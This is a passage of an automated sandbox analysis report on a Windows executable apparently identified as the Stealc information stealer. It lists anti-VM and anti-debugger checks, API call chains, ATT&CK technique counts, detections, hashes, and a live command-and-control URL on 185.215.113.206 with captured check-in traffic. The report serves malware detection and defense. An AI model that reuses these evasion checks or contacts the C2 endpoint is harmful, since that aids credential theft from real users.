              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E42390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00E42390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E44B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E44B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E4D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00E4DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E316A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E316B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E51BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00E51BF0
              Source: file.exe, file.exe, 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2264756747.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
              Source: file.exe, 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26295
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26303
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26148
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26168
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26192
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E34A60 VirtualProtect 00000000,00000004,00000100,?0_2_00E34A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E56390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56390 mov eax, dword ptr fs:[00000030h]0_2_00E56390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E52AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00E52AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 1488, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E546A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, | 0_2_00E546A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E54610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle, | 0_2_00E54610
Source: file.exe, file.exe, 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: IcProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00E52D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E52B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, | 0_2_00E52B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E52A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00E52A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E52C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_00E52C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.2177796637.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1488, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.2177796637.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1488, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (number in parentheses is the count of matched signatures for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (13) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.206/c4becf79229cb002.phptop | 100% | Avira URL Cloud | malware |
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/ws | file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpw | file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpH | file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phptop | file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1562275
                            Start date and time:2024-11-25 12:57:13 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 79%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 122
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                            • Excluded IPs from analysis (whitelisted): 20.198.118.190
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.206 | file.exe | Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/
185.215.113.206 | file.exe | Get hash | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar | Browse | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/c4becf79229cb002.php
                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC Stealer | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC Stealer | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC Stealer | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC Stealer | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.944055505969845
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'773'568 bytes
                            MD5:754418530dca8e93cba3a5a7f409f441
                            SHA1:b847b0861f4e1d1d309c0bdf51f02fb8954663f7
                            SHA256:0d025b505282376cd436001c8148e720475463ac9c266bf3788689f93147a178
                            SHA512:f833a2f6477443f23928194b305d88089c5ed15854b18e9664c211b46446cfc0a9b33ffb4726fb2b91a537455bc079c6028c369bf6aba9ce38ee3ed6ff7ca859
                            SSDEEP:49152:AsCLPrDVudJV4/EUB6Pm+T1AseltjYlxdAN:hC7rDgJa/EUq31Olt83dA
                            TLSH:7C85335084D687E8D10E693A68372ACEB3F0E8E225F412E5BF5C4AFD6553064D8F72E4
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xa84000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007FD7F912353Ah
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | 6de42760512711bbb87411ce1ff7591e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | 89a3dac65d243a9ca3df1193403689ba | False | 0.794921875 | data | 6.050181618362197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x29f000 | 0x200 | 5ad228d735815b19a90501b764116783 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mipucltu | 0x4eb000 | 0x198000 | 0x197200 | ae12f35653889be0294e34e00d13afb4 | False | 0.994617362603623 | data | 7.95313555425277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sqflgmcm | 0x683000 | 0x1000 | 0x400 | e058fee004ac3cf662e2fe61e85238aa | False | 0.76171875 | data | 6.010065609269607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x684000 | 0x3000 | 0x2200 | d20c06754105585ea65dee0f0ee2c13f | False | 0.06767003676470588 | DOS executable (COM) | 0.7861989387174687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x681e6c | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535

DLL | Import
kernel32.dll | lstrcpy

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T12:58:18.417120+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49722 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 12:58:16.246881962 CET | 49722 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 12:58:16.366736889 CET | 80 | 49722 | 185.215.113.206 | 192.168.2.6
Nov 25, 2024 12:58:16.366908073 CET | 49722 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 12:58:16.368027925 CET | 49722 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 12:58:16.487584114 CET | 80 | 49722 | 185.215.113.206 | 192.168.2.6
Nov 25, 2024 12:58:17.831347942 CET | 80 | 49722 | 185.215.113.206 | 192.168.2.6
